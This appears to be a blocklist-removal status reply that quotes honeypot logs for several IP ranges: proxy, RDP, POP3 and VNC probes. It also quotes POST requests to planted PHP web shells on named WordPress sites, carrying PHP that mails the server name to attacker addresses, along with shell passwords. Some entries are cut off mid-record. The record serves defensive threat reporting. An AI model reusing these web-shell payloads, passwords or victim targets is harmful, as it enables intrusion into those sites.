5.45.64.0/245.45.64.14: removed5.45.64.20: removed5.45.64.32: removed5.4

1. 5.45.64.0/24
2. 5.45.64.14: removed
3. 5.45.64.20: removed
4. 5.45.64.32: removed
5. 5.45.64.39: removed
6. 5.45.64.92: removed
7. 5.45.64.228: removed
8.  
9. 5.45.64.161: Recent logs:
10. Date: 2017-03-06 16:36:06
11. Attacker ip: 5.45.64.161
12. {
13. "PORT HIT": "5.45.64.161:35226->89.33.5.34:1080",
14. "MESSAGES": "Array
15. (
16. [17:34:42] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
17. Host: cdnjs.cloudflare.com
18. User-Agent: Go-http-client/1.1
19. Accept-Encoding: gzip
20.  
21.  
22. )
23. "
24. }
25. Date: 2017-03-06 16:35:23
26. Attacker ip: 5.45.64.161
27. {
28. "PORT HIT": "5.45.64.161:49206->178.79.134.254:1080"
29. }
30. Date: 2017-03-06 16:16:40
31. Attacker ip: 5.45.64.161
32. {
33. "PORT HIT": "5.45.64.161:55544->89.33.5.60:1080",
34. "MESSAGES": "Array
35. (
36. [17:15:44] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
37. Host: cdnjs.cloudflare.com
38. User-Agent: Go-http-client/1.1
39. Accept-Encoding: gzip
40.  
41.  
42. )
43. "
44. }
45. Date: 2017-03-06 15:57:35
46. Attacker ip: 5.45.64.161
47. {
48. "PORT HIT": "5.45.64.161:35756->89.33.5.53:1080",
49. "MESSAGES": "Array
50. (
51. [16:56:11] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
52. Host: cdnjs.cloudflare.com
53. User-Agent: Go-http-client/1.1
54. Accept-Encoding: gzip
55.  
56.  
57. )
58. "
59. }
60. Date: 2017-03-06 15:56:48
61. Attacker ip: 5.45.64.161
62. {
63. "PORT HIT": "5.45.64.161:42606->113.52.133.234:1080"
64. }
65. Date: 2017-03-06 15:38:12
66. Attacker ip: 5.45.64.161
67. {
68. "PORT HIT": "5.45.64.161:34590->51.255.53.224:1080",
69. "MESSAGES": "Array
70. (
71. [09:40:33] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
72. Host: cdnjs.cloudflare.com
73. User-Agent: Go-http-client/1.1
74. Accept-Encoding: gzip
75.  
76.  
77. )
78. "
79. }
80. Date: 2017-03-06 15:37:44
81. Attacker ip: 5.45.64.161
82. {
83. "PORT HIT": "5.45.64.161:41884->178.32.99.247:1080",
84. "MESSAGES": "Array
85. (
86. [09:32:40] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
87. Host: cdnjs.cloudflare.com
88. User-Agent: Go-http-client/1.1
89. Accept-Encoding: gzip
90.  
91.  
92. )
93. "
94. }
95. Date: 2017-03-06 15:37:39
96. Attacker ip: 5.45.64.161
97. {
98. "PORT HIT": "5.45.64.161:48624->192.168.0.54:1080",
99. "MESSAGES": "Array
100. (
101. [14:33:25] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
102. Host: cdnjs.cloudflare.com
103. User-Agent: Go-http-client/1.1
104. Accept-Encoding: gzip
105. 5.45.67.0/24
106. 5.45.67.5: removed
107. 5.45.67.80: removed
108. 5.45.70.0/24
109. 5.45.70.73:
110. Date: 2017-02-05 18:50:46
111. Attacker ip: 5.45.70.73
112. {
113. "ip": "5.45.70.73",
114. "listname": "openbl_1days",
115. "listlink": "https://www.openbl.org/lists/base_1days.txt"
116. }
117. 5.45.70.75: removed
118. 5.45.70.94: removed
119. 5.45.70.108: from this IP we experienced lots of GHH port hits
120. 5.45.72.0/24
121. 5.45.72.29:
122. Date: 2017-02-27 22:09:28
123. Attacker ip: 5.45.72.29
124. {
125. "PORT HIT": "5.45.72.29:52984->23.239.77.95:3389",
126. "MESSAGES": "Array
127. (
128. [17:03:52] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
129. u0001u0000bu0000u0003u0000u0000u0000
130. )
131. "
132. }
133. Date: 2017-02-27 22:09:27
134. Attacker ip: 5.45.72.29
135. {
136. "PORT HIT": "5.45.72.29:52983->23.239.77.93:3389",
137. "MESSAGES": "Array
138. (
139. [17:03:52] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
140. u0001u0000bu0000u0003u0000u0000u0000
141. )
142. "
143. }
144. Date: 2017-02-27 22:09:27
145. Attacker ip: 5.45.72.29
146. {
147. "PORT HIT": "5.45.72.29:52982->23.239.77.92:3389",
148. "MESSAGES": "Array
149. (
150. [17:03:52] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
151. u0001u0000bu0000u0003u0000u0000u0000
152. 5.45.72.39:removed
153. 5.45.75.0/24
154. 5.45.75.2:
155. Date: 2017-03-12 14:15:17
156. Attacker ip: 5.45.75.2
157. {
158. "PORT HIT": "5.45.75.2:35242->37.235.1.96:110",
159. "MESSAGES": "Array
160. (
161. [14:09:46] => USER sexual.sexual@everymail.net
162.  
163. [14:09:46+1] => QUIT
164.  
165. )
166. "
167. }
168. Date: 2017-03-12 05:43:27
169. Attacker ip: 5.45.75.2
170. {
171. "PORT HIT": "5.45.75.2:55893->37.235.1.96:110",
172. "MESSAGES": "Array
173. (
174. [05:35:58] => USER showboat@everymail.net
175.  
176. [05:35:58+1] => QUIT
177.  
178. )
179. "
180. }
181. Date: 2017-03-11 17:13:56
182. Attacker ip: 5.45.75.2
183. {
184. "PORT HIT": "5.45.75.2:36460->5.63.147.236:110",
185. "MESSAGES": "Array
186. (
187. [16:08:01] => USER kurt_castilloae@100-biker.co.uk
188.  
189. [16:08:01+1] => QUIT
190.  
191. )
192. "
193. }
194. Date: 2017-03-11 01:43:01
195. Attacker ip: 5.45.75.2
196. {
197. "PORT HIT": "5.45.75.2:52421->84.2.35.144:110",
198. "MESSAGES": "Array
199. (
200. [01:41:59] => USER aloksa@loksacel.hu
201.  
202. [01:41:59+1] => QUIT
203.  
204. 5.45.75.24 not able to remove it from the greylist.
205. 5.45.75.28: removed
206. 5.45.75.41: removed
207. 5.45.75.49: removed
208. 5.45.76.0/24
209. 5.45.76.15:
210. Date: 2017-03-02 19:01:46
211. Victim domain: www.anodizadosbp.com
212. Attacker ip: 5.45.76.15
213. Url: [www.anodizadosbp.com/wp-content/themes/twentytwelve/contact.php]
214. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
215. Post data: [Array
216. (
217. [a] => Php
218. [c] =>
219. [p1] =>
220. $to = "intronet1337@gmail.com";
221. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
222.  
223. $to = "timur.mamoedov@yandex.ru";
224. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
225.  
226. [p2] =>
227. [p3] =>
228. [charset] => UTF-8
229. [pass] => jgOoo1skw2a_
230. )
231. ]
232. Date: 2017-03-02 18:49:37
233. Victim domain: www.chintannipale.com
234. Attacker ip: 5.45.76.15
235. Url: [www.chintannipale.com/wp-content/db_info.class.php]
236. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
237. Post data: [Array
238. (
239. [a] => Php
240. [c] =>
241. [p1] =>
242. $to = "intronet1337@gmail.com";
243. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
244.  
245. $to = "timur.mamoedov@yandex.ru";
246. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
247.  
248. [p2] =>
249. [p3] =>
250. [charset] => UTF-8
251. [pass] => ryfgddjs1
252. )
253. ]
254. Date: 2017-03-02 18:49:36
255. Victim domain: www.absbe.com
256. Attacker ip: 5.45.76.15
257. Url: [www.absbe.com/wp-content/common.php]
258. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
259. Post data: [Array
260. (
261. [a] => Php
262. [c] =>
263. [p1] =>
264. $to = "intronet1337@gmail.com";
265. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
266.  
267. $to = "timur.mamoedov@yandex.ru";
268. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
269.  
270. [p2] =>
271. [p3] =>
272. [charset] => UTF-8
273. [pass] => nbJK@SHN2
274. )
275. ]
276. Date: 2017-03-02 18:49:27
277. Victim domain: www.davidbillis.net
278. Attacker ip: 5.45.76.15
279. Url: [www.davidbillis.net/wp-los.php]
280. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
281. Post data: [Array
282. (
283. [a] => Php
284. [c] =>
285. [p1] =>
286. $to = "intronet1337@gmail.com";
287. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
288.  
289. $to = "timur.mamoedov@yandex.ru";
290. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
291.  
292. [p2] =>
293. [p3] =>
294. [charset] => UTF-8
295. [pass] => jgOoo1skw2a_
296. )
297. ]
298. Date: 2017-03-02 18:49:25
299. Victim domain: www.chambreavecvie.com
300. Attacker ip: 5.45.76.15
301. Url: [www.chambreavecvie.com/setting.php]
302. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
303. Post data: [Array
304. (
305. [a] => Php
306. [c] =>
307. [p1] =>
308. $to = "intronet1337@gmail.com";
309. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
310.  
311. $to = "timur.mamoedov@yandex.ru";
312. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
313.  
314. [p2] =>
315. [p3] =>
316. [charset] => UTF-8
317. [pass] => 8I5Ra7z2LaSinfQ
318. )
319. ]
320. Date: 2017-03-02 16:04:36
321. Victim domain: www.bratanis.org
322. Attacker ip: 5.45.76.15
323. Url: [www.bratanis.org/conter.php]
324. Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
325. Post data: [Array
326. (
327. [a] => Php
328. [c] =>
329. [p1] =>
330. $to = "intronet1337@gmail.com";
331. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
332.  
333. $to = "timur.mamoedov@yandex.ru";
334. mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
335.  
336. [p2] =>
337. [p3] =>
338. [charset] => UTF-8
339. [pass] => jgOoo1skw2a_
340. )
341. ]
342. 5.45.76.44: removed
343. 5.45.76.53: removed
344. 5.45.76.229: removed
345. 5.45.77.0/24
346. 5.45.77.6: not able to remove
347. 5.45.77.30: removed
348. 5.45.77.40: was only on user greylist, but removed from that
349. 5.45.77.78: removed
350. 5.45.84.0/24: isn't in greylist
351. 37.1.202.0/24
352. 37.1.202.31: not able to remove
353. 37.1.202.44: removed
354. 37.1.202.83: it is only on user greylist:
355. Date: 2017-03-08 13:28:26
356. Attacker ip: 37.1.202.83
357. {
358. "PORT HIT": "37.1.202.83:63254->72.29.77.55:3389",
359. "MESSAGES": "Array
360. (
361. [07:20:39] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
362. u0001u0000bu0000u0003u0000u0000u0000
363. )
364. "
365. }
366. Date: 2017-03-08 13:28:24
367. Attacker ip: 37.1.202.83
368. {
369. "PORT HIT": "37.1.202.83:56715->72.29.66.61:3389",
370. "MESSAGES": "Array
371. (
372. [07:20:32] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
373. u0001u0000bu0000u0003u0000u0000u0000
374. )
375. "
376. }
377. 37.1.202.93: removed
378. 37.1.202.200:
379. Date: 2017-03-10 18:32:07
380. Attacker ip: 37.1.202.200
381. {
382. "PORT HIT": "37.1.202.200:39870->89.248.172.104:5900"
383. }
384. Date: 2017-03-10 13:34:42
385. Attacker ip: 37.1.202.200
386. {
387. "PORT HIT": "37.1.202.200:54920->185.127.128.5:5900"
388. }
389. Date: 2017-03-09 12:44:12
390. Attacker ip: 37.1.202.200
391. {
392. "PORT HIT": "37.1.202.200:50440->37.97.220.160:5900"
393. }
394. Date: 2017-03-09 06:57:01
395. Attacker ip: 37.1.202.200
396. {
397. "PORT HIT": "37.1.202.200:42278->91.227.204.247:5666"
398. }
399. Date: 2017-03-09 06:41:50
400. Attacker ip: 37.1.202.200
401. {
402. "PORT HIT": "37.1.202.200:45080->84.2.35.129:5900"
403. }
404. Date: 2017-03-09 06:36:33
405. Attacker ip: 37.1.202.200
406. {
407. "PORT HIT": "37.1.202.200:48006->185.127.128.5:5900"
408. }
409. Date: 2017-03-08 21:50:39
410. Attacker ip: 37.1.202.200
411. {
412. "PORT HIT": "37.1.202.200:35250->91.227.204.21:5666"
413. }
414. Date: 2017-03-08 19:59:38
415. Attacker ip: 37.1.202.200
416. {
417. "PORT HIT": "37.1.202.200:39376->89.248.172.104:5900"
418. }
419. 37.1.202.225: not able to remove
420. 37.1.202.240: was only on user greylist, but removed from it
421. 37.1.202.253: removed
422. 37.1.205.0/24
423. 37.1.205.86: not able to remove
424. 37.1.205.87: was only on user greylist, but removed from it
425. 37.1.205.91: removed
426. 37.1.206.0/24
427. 37.1.206.8: not able to remove
428. 37.1.206.114: was only on user greylist, but removed from it